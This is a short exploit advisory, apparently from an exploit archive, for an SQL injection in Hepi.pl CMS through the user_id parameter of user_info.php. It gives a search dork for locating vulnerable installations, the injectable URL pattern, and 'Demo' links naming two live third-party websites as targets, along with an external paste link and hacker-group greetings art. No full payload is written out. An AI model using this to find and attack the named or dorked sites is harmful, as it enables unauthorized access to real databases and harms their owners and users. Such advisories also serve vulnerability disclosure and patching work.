It looks like you're new here. If you want to get involved, click one of these buttons!
---------------------------------------------------------------------
Exploit Title : Hepi.pl CMS == SQL Injection Vulnerability
---------------------------------------------------------------------
Author : linc0ln.dll
Date : 01/07/11
Site : http://linc0ln.pl/
@ : linc0ln[at]e-o-u.org
---------------------------------------------------------------------
Description :
Category : WebApps
Dork : \"Hepi.pl\"
Vendor : http://hepi.pl/
Tested On : Windows 7
---------------------------------------------------------------------
SQL Inj. :
>> http://127.0.0.1/[path]/user_info.php?user_id={SQL}
---------------------------------------------------------------------
Demo :
>> http://www.ecaytrade.com/user_info.php?user_id={SQL}
>> http://www.koduj.pl/user_info.php?user_id={SQL}
---------------------------------------------------------------------
Extra :
>> http://pastie.org/2150135
---------------------------------------------------------------------
\ \ / / /\
-HACKED- \\{__}// /((\
/ / \ \ \|aa|/ ) )
_____vvvV__(oo)__Vvvv__(_(_
| `` |
| .::Greetz To::. |
| [synthelyps.c] [fight3r] |
| [Mario_Vs] [n1k0n3r] |
| [e-o-u.org] [Skynet Crew]|
| And All The Other Friends |
|___________________________|
';;;;;( )`
\ \/ \ \//
_/_/ _/ /
vvvV^ Vvvv